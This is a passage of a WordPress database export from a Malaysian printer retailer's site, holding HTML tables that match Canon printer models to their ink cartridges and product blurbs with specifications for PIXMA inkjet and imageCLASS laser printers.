(Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-24 16:14:21','2019-09-24 08:14:21','',1449,'https://bintara.com.my/blog/2019/09/24/1449-revision-v1/',0,'revision','',0),(3303,1,'2019-09-24 16:15:23','2019-09-24 08:15:23','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><p>Â </p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center><p>Â </p>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h3>Laser Printers :-</h3>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Printing</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 43ppm</li><li>Recommended monthly print volume: 2,000 - 7,500 pages</li><li>FPOT: 6.2secs. (A4)</li><li>Max. paper input capacity: Up to 2,300 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 38ppm</li><li>Recommended monthly print volume: 750 - 4,000 pages</li><li>FPOT: 5.5secs. (A4)</li><li>Max. paper input capacity: Up to 900 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Cartridge Printers :-</h3>		\n		<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td 